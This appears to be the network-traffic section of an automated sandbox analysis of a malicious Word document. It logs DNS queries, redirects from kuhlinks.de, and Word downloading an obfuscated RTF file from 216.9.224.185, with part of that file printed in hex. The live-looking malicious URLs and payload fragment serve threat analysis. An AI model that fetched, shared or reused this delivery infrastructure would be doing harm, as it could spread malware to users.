            Apr 2, 2025 12:02:26.708411932 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:27.817789078 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:30.036571980 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:34.458452940 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:43.286643028 CEST6084080192.168.2.24216.9.224.185
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Apr 2, 2025 12:00:38.312674999 CEST | 52688 | 53 | 192.168.2.24 | 1.1.1.1
            Apr 2, 2025 12:00:38.558067083 CEST | 53 | 52688 | 1.1.1.1 | 192.168.2.24
            Apr 2, 2025 12:00:44.617645979 CEST | 52688 | 53 | 192.168.2.24 | 1.1.1.1
            Apr 2, 2025 12:00:45.011636972 CEST | 53 | 52688 | 1.1.1.1 | 192.168.2.24
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Apr 2, 2025 12:00:38.312674999 CEST | 192.168.2.24 | 1.1.1.1 | 0x9350 | Standard query (0) | kuhlinks.de | A (IP address) | IN (0x0001) | false
            Apr 2, 2025 12:00:44.617645979 CEST | 192.168.2.24 | 1.1.1.1 | 0x86fb | Standard query (0) | 185.224.9.216.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Apr 2, 2025 12:00:37.672543049 CEST | 1.1.1.1 | 192.168.2.24 | 0xc9f9 | No error (0) | ecs-office.s-0005.dual-s-msedge.net | s-0005.dual-s-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
            Apr 2, 2025 12:00:37.672543049 CEST | 1.1.1.1 | 192.168.2.24 | 0xc9f9 | No error (0) | s-0005.dual-s-msedge.net | | 52.123.129.14 | A (IP address) | IN (0x0001) | false
            Apr 2, 2025 12:00:37.672543049 CEST | 1.1.1.1 | 192.168.2.24 | 0xc9f9 | No error (0) | s-0005.dual-s-msedge.net | | 52.123.128.14 | A (IP address) | IN (0x0001) | false
            Apr 2, 2025 12:00:38.558067083 CEST | 1.1.1.1 | 192.168.2.24 | 0x9350 | No error (0) | kuhlinks.de | | 172.67.144.140 | A (IP address) | IN (0x0001) | false
            Apr 2, 2025 12:00:38.558067083 CEST | 1.1.1.1 | 192.168.2.24 | 0x9350 | No error (0) | kuhlinks.de | | 104.21.47.51 | A (IP address) | IN (0x0001) | false
            Apr 2, 2025 12:00:45.011636972 CEST | 1.1.1.1 | 192.168.2.24 | 0x86fb | No error (0) | 185.224.9.216.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001) | false
            Apr 2, 2025 12:00:47.287020922 CEST | 1.1.1.1 | 192.168.2.24 | 0x6a7b | No error (0) | res-stls-prod.edgesuite.net.globalredir.akadns88.net | a726.dscd.akamai.net | | CNAME (Canonical name) | IN (0x0001) | false
            Apr 2, 2025 12:00:47.287020922 CEST | 1.1.1.1 | 192.168.2.24 | 0x6a7b | No error (0) | a726.dscd.akamai.net | | 23.219.161.152 | A (IP address) | IN (0x0001) | false
            • kuhlinks.de
            • 216.9.224.185
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.24 | 60836 | 216.9.224.185 | 80 | 7312 | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            Apr 2, 2025 12:00:41.830538034 CEST | 454 | OUT | HEAD /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1
            Connection: Keep-Alive
            Authorization: Bearer
            User-Agent: Microsoft Office Word 2014
            X-Office-Major-Version: 16
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
            X-IDCRL_ACCEPTED: t
            Host: 216.9.224.185
            Apr 2, 2025 12:00:42.086951971 CEST | 323 | IN | HTTP/1.1 200 OK
            Date: Wed, 02 Apr 2025 10:00:41 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
            Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT
            ETag: "198aa-631c505d8feaa"
            Accept-Ranges: bytes
            Content-Length: 104618
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.24 | 60840 | 216.9.224.185 | 80 | 7312 | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            Apr 2, 2025 12:00:43.166783094 CEST | 334 | OUT | GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive
            Host: 216.9.224.185
            Apr 2, 2025 12:00:43.414607048 CEST | 1254 | IN | HTTP/1.1 200 OK
            Date: Wed, 02 Apr 2025 10:00:43 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
            Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT
            ETag: "198aa-631c505d8feaa"
            Accept-Ranges: bytes
            Content-Length: 104618
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword
            Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 09 09 7b 5c 2a 5c 64 67 6d 4e 6f 64 65 4b 69 6e 64 38 34 34 31 33 39 33 39 32 20 5c 2d 7d 0d 7b 5c 32 39 37 36 35 30 35 31 31 2f 25 2c 3c 36 3e 32 a7 3a 2f 7e 3f 39 b0 7e 39 5f 40 25 2a 39 3d b5 40 24 7c 34 5d 28 31 3c 3a 35 31 28 39 3f 26 27 3f 2e 5b 23 2c 35 34 32 2e 2a 5f 25 25 39 37 7e 3f 3d 2d 2f 35 30 27 35 3f 2c 27 40 2f 24 3c 37 3b 31 30 2f 25 35 40 21 27 3f 40 2f 60 40 3f a7 3d 3f 5e 2b 3d 35 30 7e 3f 5e 3e 2a 23 30 2a 3f 5d 2d 3b 25 3f 5b 27 2f b0 2a 39 38 32 39 5e 25 b0 2f 33 2d b5 33 b0 3f 31 29 26 31 5e 30 28 5e 7c 2f 35 b0 28 b0 3e 5f 28 5d 28 5e 29 3b 40 3c 3f 25 7e 25 26 28 2f 3f 31 b0 2e 3c 37 2c 3f 3e 39 39 3d 3f 21 32 3a 36 25 34 2e 2d 23 5d 3d 7e a7 b0 40 b5 5d 2f 2f 3a b0 2f 3f 5d 24 2a 3b 3d 28 b0 3d 35 2a a7 39 3a 24 5f 5d 32 3c 3c 35 24 38 3c 3b 5e 2b 25 b0 34 3c 3f 3f 33 29 3f 39 21 5d 32 60 3e 2a 33 35 3a 60 40 3a 39 36 2c 3f b5 29 3b 23 3f 33 5f b5 3f 2e 5b 25 31 27 3f 5f 27 a7 25 36 3f 29 25 25 33 34 3f b0 3f 29 3e 3f 60 25 3d 27 28 2f 3f b0 5e [TRUNCATED]
            Data Ascii: {\rtf1{\*\dgmNodeKind844139392 \-}{\297650511/%,<6>2:/~?9~9_@%*9=@$|4](1<:51(9?&'?.[#,542.*_%%97~?=-/50'5?,'@/$<7;10/%5@!'?@/`@?=?^+=50~?^>*#0*?]-;%?['/*9829^%/3-3?1)&1^0(^|/5(>_(](^);@<?%~%&(/?1.<7,?>99=?!2:6%4.-#]=~@]//:/?]$*;=(=5*9:$_]2<<5$8<;^+%4<??3)?9!]2`>*35:`@:96,?);#?3_?.[%1'?_'%6?)%%34??)>?`%='(/?^`#]63;?3%``4?4-;?%,02]`)?`7?[1!92$?-4^('&?%?@;9818[|/?=[5@3.##?,7^#-4></%#?7&!3-?.7>%5`+@*4;5%,@->;'$;7)|~)#*(?~|8(_/??-?@?'79_8?$?=0,^^%4~?0]^|%]|]!=;$2%<8&<.2:1`0?]$?)@9)4.%2)`.<51%$|78?9-39[?=0#[?7:%&*0:?,26?&~@#6[9522=+@,%'8;=829)/?[[?-??&?3(:=_83.1,>`[>[5$7%~)]@]#-,=''42_(!'!%7*'%53+0/??0,?//3*;/3??:0)1<.~!42$1.?)$|>/8=<77+7%='?.1?2!.$%|.94?%]6/#?`3^08*%%%?//#343:]=%0%45$26=4+^%&=~?+:_?#$?+?5@!0<!(?)/5+&*'>2'-`>?@#_;@??.:0;&->>%+06-0)((@&?``$~+?~,<0'=//`$*:?3?~%<%-.?];[5,8.?/??%(%3]*98()649!<%!=7*?[*$#*96?@@?25?&([%%17_[?#'?'!%9@0%,$2^1-?`.[)_&
            Apr 2, 2025 12:00:45.305079937 CEST | 334 | OUT | HEAD /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            X-IDCRL_ACCEPTED: t
            User-Agent: Microsoft Office Existence Discovery
            Connection: Keep-Alive
            Host: 216.9.224.185
            Apr 2, 2025 12:00:45.576210976 CEST | 322 | IN | HTTP/1.1 200 OK
            Date: Wed, 02 Apr 2025 10:00:45 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
            Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT
            ETag: "198aa-631c505d8feaa"
            Accept-Ranges: bytes
            Content-Length: 104618
            Keep-Alive: timeout=5, max=99
            Connection: Keep-Alive
            Content-Type: application/msword


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.24 | 60832 | 172.67.144.140 | 443 | 7312 | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            2025-04-02 10:00:39 UTC | 324 | OUT | OPTIONS / HTTP/1.1
            Connection: Keep-Alive
            Authorization: Bearer
            User-Agent: Microsoft Office Word 2014
            X-Office-Major-Version: 16
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
            X-MSGETWEBURL: t
            X-IDCRL_ACCEPTED: t
            Host: kuhlinks.de
            2025-04-02 10:00:39 UTC | 1021 | IN | HTTP/1.1 200 OK
            Date: Wed, 02 Apr 2025 10:00:39 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Cf-Ray: 929f7afd6a2eb2c0-EWR
            Server: cloudflare
            Allow: GET,HEAD
            Strict-Transport-Security: max-age=15552000; includeSubDomains
            X-Content-Type-Options: nosniff
            X-Dns-Prefetch-Control: off
            X-Download-Options: noopen
            X-Frame-Options: SAMEORIGIN
            X-Xss-Protection: 1; mode=block
            Cf-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJWlFlQPdb9ELvMhM6flFdOdNcTSnw01udc1T2puqczOsLlmMEr7BfAb5KY6fwk%2FzoRleTyJ%2FM8e8bnfs8ncyT8FyKDz63PL1zqQpOObncI27mbpK8QzAtUN%2BCjd0w%3D%3D"}],"group":"cf-nel","max_age":604800}
            Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=111968&min_rtt=99158&rtt_var=34397&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=938&delivery_rate=37553&cwnd=232&unsent_bytes=0&cid=3be4d5f1ebddf068&ts=591&x=0"
            2025-04-02 10:00:39 UTC | 13 | IN | Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
            Data Ascii: 8GET,HEAD
            2025-04-02 10:00:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.24 | 60833 | 172.67.144.140 | 443 | 7312 | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            2025-04-02 10:00:39 UTC | 227 | OUT | OPTIONS / HTTP/1.1
            Authorization: Bearer
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            X-IDCRL_ACCEPTED: t
            User-Agent: Microsoft Office Protocol Discovery
            Host: kuhlinks.de
            Content-Length: 0
            Connection: Keep-Alive
            2025-04-02 10:00:40 UTC | 1020 | IN | HTTP/1.1 200 OK
            Date: Wed, 02 Apr 2025 10:00:40 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Cf-Ray: 929f7b031e81377d-EWR
            Server: cloudflare
            Allow: GET,HEAD
            Strict-Transport-Security: max-age=15552000; includeSubDomains
            X-Content-Type-Options: nosniff
            X-Dns-Prefetch-Control: off
            X-Download-Options: noopen
            X-Frame-Options: SAMEORIGIN
            X-Xss-Protection: 1; mode=block
            Cf-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8NZZxs2YpcMN0sC2HNRbherDeG1doE4c7BoJhBaKHs8EPYnIu88wLIeUS0Lv7i3B%2FyubEH8CEmh9932zmdxXkYRsILVsefSrYoevQ2rlSR4dSZ%2F9x6iB2DlDF27ng%3D%3D"}],"group":"cf-nel","max_age":604800}
            Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=131428&min_rtt=130398&rtt_var=28563&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=841&delivery_rate=28558&cwnd=226&unsent_bytes=0&cid=6d5d3262b51173d4&ts=639&x=0"
            2025-04-02 10:00:40 UTC | 13 | IN | Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
            Data Ascii: 8GET,HEAD
            2025-04-02 10:00:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            2 | 192.168.2.24 | 60834 | 172.67.144.140 | 443 | 7312 | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            2025-04-02 10:00:40 UTC | 310 | OUT | HEAD /3ri5DVX HTTP/1.1
            Connection: Keep-Alive
            Authorization: Bearer
            User-Agent: Microsoft Office Word 2014
            X-Office-Major-Version: 16
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
            X-IDCRL_ACCEPTED: t
            Host: kuhlinks.de
            2025-04-02 10:00:41 UTC | 1204 | IN | HTTP/1.1 302 Found
            Date: Wed, 02 Apr 2025 10:00:41 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 192
            Connection: close
            location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc
            strict-transport-security: max-age=15552000; includeSubDomains
            vary: Accept
            x-content-type-options: nosniff
            x-dns-prefetch-control: off
            x-download-options: noopen
            x-frame-options: SAMEORIGIN
            x-xss-protection: 1; mode=block
            cf-cache-status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ObtIqYNqC8BkUIwIt4b%2FWdMpovXDYnPDi568zH8s3%2Bp8K8cMoZYC461VPHTT6wO%2F28TRvIGiTcqnVniVRPZdVU28Mu1SJzpIo3sgrS2JukUJ0Oe%2F3pKOKZ%2BWMLDl%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 929f7b091968566e-EWR
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=134831&min_rtt=130470&rtt_var=32039&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=924&delivery_rate=28529&cwnd=234&unsent_bytes=0&cid=6c32449698082076&ts=656&x=0"


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            3 | 192.168.2.24 | 60838 | 172.67.144.140 | 443 | 7312 | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            2025-04-02 10:00:42 UTC | 190 | OUT | GET /3ri5DVX HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: kuhlinks.de
            Connection: Keep-Alive
            2025-04-02 10:00:42 UTC | 1194 | IN | HTTP/1.1 302 Found
            Date: Wed, 02 Apr 2025 10:00:42 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 192
            Connection: close
            Cf-Ray: 929f7b11df014228-EWR
            Server: cloudflare
            Location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc
            Strict-Transport-Security: max-age=15552000; includeSubDomains
            Vary: Accept
            X-Content-Type-Options: nosniff
            X-Dns-Prefetch-Control: off
            X-Download-Options: noopen
            X-Frame-Options: SAMEORIGIN
            X-Xss-Protection: 1; mode=block
            Cf-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dC7WRBeFABtnDyAUDvDACHhjdYz5q4F7LA%2BD5selGvWflkZbqyRFii0HI9gJxNYYCvCiA509LuCycQmVSpq4XKE0pbU9QQ%2BHts6Gm6IfDs9kzaGuLJFJzcsh5haAYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
            Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=96632&min_rtt=95927&rtt_var=20956&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=772&delivery_rate=38824&cwnd=217&unsent_bytes=0&cid=17cffa7a754cd8c1&ts=567&x=0"
            2025-04-02 10:00:42 UTC | 175 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 31 36 2e 39 2e 32 32 34 2e 31 38 35 2f 31 32 32 2f 77 65 6e 64 2f 73 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 77 65 63 61 6e 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 5f 5f 5f 5f 5f 5f 5f 5f 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74
            Data Ascii: Found. Redirecting to http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeet
            2025-04-02 10:00:42 UTC | 17 | IN | Data Raw: 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 2e 64 6f 63
            Data Ascii: urncheclkgood.doc


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            4 | 192.168.2.24 | 60843 | 172.67.144.140 | 443 | 7312 | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            2025-04-02 10:00:44 UTC | 213 | OUT | HEAD /3ri5DVX HTTP/1.1
            Authorization: Bearer
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            X-IDCRL_ACCEPTED: t
            User-Agent: Microsoft Office Existence Discovery
            Host: kuhlinks.de
            Connection: Keep-Alive
            2025-04-02 10:00:45 UTC | 1196 | IN | HTTP/1.1 302 Found
            Date: Wed, 02 Apr 2025 10:00:45 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 192
            Connection: close
            Cf-Ray: 929f7b209fd7d826-EWR
            Location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc
            Strict-Transport-Security: max-age=15552000; includeSubDomains
            Vary: Accept
            X-Content-Type-Options: nosniff
            X-Dns-Prefetch-Control: off
            X-Download-Options: noopen
            X-Frame-Options: SAMEORIGIN
            X-Xss-Protection: 1; mode=block
            Cf-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IP2C12XfXgrT%2Fb8TrQaKQQn4KzUdZNoMgtI1Icnp4EMAxDTMyEkpIeo3ZiN2Qwtli%2F3NDvFs2v%2FAdOWUvwzzEz8700eHN2Wpuh6p1JNdVCDBX1I1ymMHQ5OJc0q0AA%3D%3D"}],"group":"cf-nel","max_age":604800}
            Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=98139&min_rtt=97709&rtt_var=21260&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=827&delivery_rate=37626&cwnd=241&unsent_bytes=0&cid=57b00569acf32f17&ts=598&x=0"



            Target ID:1
            Start time:06:00:33
            Start date:02/04/2025
            Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
            Imagebase:0x7ff7f51c0000
            File size:1'637'952 bytes
            MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

            No disassembly